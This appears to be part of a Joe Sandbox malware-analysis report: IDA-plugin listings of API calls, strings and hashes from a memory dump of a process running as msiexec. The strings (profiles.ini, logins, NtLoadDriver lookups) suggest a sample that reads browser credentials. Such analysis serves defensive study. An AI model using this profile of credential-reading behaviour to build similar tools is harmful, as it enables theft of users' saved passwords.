                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                      • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                      • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                      • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                      • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                      • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                      • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                      • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                      • String ID:
                                                                                                      • API String ID: 829165378-0
                                                                                                      • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                      • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                      • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                      • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00404172
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                      • wcscpy.MSVCRT ref: 004041D6
                                                                                                      • wcscpy.MSVCRT ref: 004041E7
                                                                                                      • memset.MSVCRT ref: 00404200
                                                                                                      • memset.MSVCRT ref: 00404215
                                                                                                      • _snwprintf.MSVCRT ref: 0040422F
                                                                                                      • wcscpy.MSVCRT ref: 00404242
                                                                                                      • memset.MSVCRT ref: 0040426E
                                                                                                      • memset.MSVCRT ref: 004042CD
                                                                                                      • memset.MSVCRT ref: 004042E2
                                                                                                      • _snwprintf.MSVCRT ref: 004042FE
                                                                                                      • wcscpy.MSVCRT ref: 00404311
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                      • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                      • API String ID: 2454223109-1580313836
                                                                                                      • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                      • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                      • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                      • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                      • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                      • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                      • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                      • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                      • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                      • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                      • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                      • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                      • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                      • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                      • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                        • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                        • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                      • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                      • API String ID: 4054529287-3175352466
                                                                                                      • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                      • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                      • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                      • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                      • API String ID: 3143752011-1996832678
                                                                                                      • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                      • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                      • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                      • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                      • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                      • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                      • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                      • API String ID: 667068680-2887671607
                                                                                                      • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                      • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                      • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                      • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                      • API String ID: 1607361635-601624466
                                                                                                      • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                      • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                      • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                      • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintf$memset$wcscpy
                                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                      • API String ID: 2000436516-3842416460
                                                                                                      • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                      • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                      • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                      • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                      APIs
                                                                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                        • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                        • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                        • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                      • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                      • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                      • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                      • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                      • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                      • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                      • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                      • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                      • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 1043902810-0
                                                                                                      • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                      • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                      • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                      • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                      APIs
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                                      • _snwprintf.MSVCRT ref: 0044488A
                                                                                                      • wcscpy.MSVCRT ref: 004448B4
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                      • API String ID: 2899246560-1542517562
                                                                                                      • Opcode ID: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                                                      • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                      • Opcode Fuzzy Hash: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                                                      • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040DBCD
                                                                                                      • memset.MSVCRT ref: 0040DBE9
                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                        • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                                        • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                        • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                      • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                      • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                      • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                      • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                      • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                      • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                      • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                      • API String ID: 3330709923-517860148
                                                                                                      • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                      • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                      • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                      • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                        • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                      • memset.MSVCRT ref: 0040806A
                                                                                                      • memset.MSVCRT ref: 0040807F
                                                                                                      • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                      • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                      • memset.MSVCRT ref: 004081E4
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                        • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                        • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                      • String ID: logins$null
                                                                                                      • API String ID: 2148543256-2163367763
                                                                                                      • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                      • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                      • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                      • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                      APIs
                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                      • memset.MSVCRT ref: 004085CF
                                                                                                      • memset.MSVCRT ref: 004085F1
                                                                                                      • memset.MSVCRT ref: 00408606
                                                                                                      • strcmp.MSVCRT ref: 00408645
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                      • memset.MSVCRT ref: 0040870E
                                                                                                      • strcmp.MSVCRT ref: 0040876B
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                      • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                      • String ID: ---
                                                                                                      • API String ID: 3437578500-2854292027
                                                                                                      • Opcode ID: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                                      • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                      • Opcode Fuzzy Hash: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                                      • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0041087D
                                                                                                      • memset.MSVCRT ref: 00410892
                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                      • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                      • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                      • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                      • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                      • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                      • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                      • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                      • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 1010922700-0
                                                                                                      • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                      • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                      • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                      • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                      APIs
                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                      • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                      • malloc.MSVCRT ref: 004186B7
                                                                                                      • free.MSVCRT ref: 004186C7
                                                                                                      • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                      • free.MSVCRT ref: 004186E0
                                                                                                      • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                      • malloc.MSVCRT ref: 004186FE
                                                                                                      • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                      • free.MSVCRT ref: 00418716
                                                                                                      • free.MSVCRT ref: 0041872A
                                                                                                      • free.MSVCRT ref: 00418749
